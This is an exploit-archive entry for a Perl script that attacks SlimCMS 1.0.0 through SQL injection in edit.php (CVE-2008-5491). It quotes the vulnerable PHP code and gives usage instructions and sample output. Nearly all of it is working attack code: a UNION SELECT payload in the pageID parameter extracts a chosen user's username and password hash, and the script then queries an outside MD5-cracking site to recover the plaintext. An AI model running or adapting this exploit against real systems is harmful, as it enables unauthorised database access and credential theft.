SlimCMS 1.0.0 - 'edit.php' SQL Injection



EKU-ID: 14986 CVE: OSVDB-50703;CVE-2008-5491 OSVDB-ID:
Author: StAkeR Published: 2008-11-14 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


#!/usr/bin/perl

=starting

 --------------------------------------------------------
 SlimCMS <= 1.0.0 (edit.php) Remote SQL Injection Exploit
 --------------------------------------------------------
 by athos - staker[at]hotmail[dot]it

 download on sourceforge


 File edit.php

 111. if ($password == md5($_POST['password']))
 112. {
 113.    if (strlen($_POST['cmsText']) > 2) {
 114. $query  = "UPDATE pages SET title = '".$_POST['pageTitle']."', content =  '".
      strip_tags(stripslashes($_POST['cmsText']),$allowedTags)."' WHERE ID = ".$_GET['pageID'];
 115. mysql_query($query);
 116. //$successfulyUpdated
 117. responseText = $successfulyUpdated;
 118. }
 119.
 120. if (strlen($_GET['pageID']) > 0) {
 121. $query  = "SELECT * FROM pages WHERE ID = ".$_GET['pageID'];
 122. $result = mysql_query($query);
 123.
 124.
 125. while($row = mysql_fetch_array($result)) {
 126.	$pageTitle = $row['title'];
 127.	$pageContent = $row['content'];
 128.  }
 129. }

 NOTE: Works Regardless PHP.ini Settings!


  you must be logged..

  Usage: perl "exploit.pl" [HOST] [username:password] [USER_ID]

  Output: Username: athos
          Password: 27e43424d53719a645ae7cca038b45be



=cut

use strict;
use LWP::UserAgent;
use LWP::Simple;

my $match = q{Editing page "(.+?)"};
my $http = new LWP::UserAgent;
my $post = undef;
my @login = ();
my @out = ();

my ($host,$auth,$myid) = @ARGV;

unless($host =~ /http:\/\/(.+?)$/i && $auth && $myid)
{
    print STDOUT "Usage: perl $0 [host/path] [username:password] [id]\r\n";
    exit;
}

$host .= "/edit.php?pageID=-1 union select 1,concat(username,0x3a,password),3,4 from users where id=$myid#";

@login = split(':',$auth);

$post = $http->post($host,[
                            username => $login[0],
                            password => $login[1],
                         ]);


if($post->is_success && $post->content =~ $match)
{
    @out = split(':',$1);

    if($#out => 2)
    {
        my $cracked = search_MD5($out[1]);

        print STDOUT "Username: $out[0]\r\n";
        print STDOUT "Password: $out[1] -> $cracked\r\n";
        exit;
   }
   else
   {
       print STDOUT "Exploit Failed!\r\n";
       print STDOUT "Login incorrect or site not vulnerable\\available!\r\n";
       exit;
   }
}


sub search_MD5
{
    my $hash = shift @_;
    my $cont = undef;

    $cont = get('http://md5.rednoize.com/?p&s=md5&q='.$hash);

    if(length($hash) => 32 && !is_error($cont))
    {
        return $cont;
    }
    else
    {
        return exit;
    }
}

__END__

# milw0rm.com [2008-11-14]